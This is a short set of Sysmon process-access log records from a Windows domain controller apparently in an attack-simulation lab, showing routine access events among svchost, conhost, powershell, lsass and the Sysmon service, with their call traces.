{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2658,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.003\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.003","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2659,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.003\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.003","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2660,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.003\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.003","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2661,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.003\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.003","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2662,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.003\r\nSourceProcessGUID: {E2A3D6B1-108F-5F25-0000-001040B60400}\r\nSourceProcessId: 4612\r\nSourceThreadId: 4632\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1090-5F25-0000-00104EB90400}\r\nTargetProcessId: 4688\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.003","SourceProcessGUID":"{E2A3D6B1-108F-5F25-0000-001040B60400}","SourceProcessId":"4612","SourceThreadId":"4632","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1090-5F25-0000-00104EB90400}","TargetProcessId":"4688","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2663,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.019\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.019","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2664,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.019\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.019","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2665,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.019\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.019","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
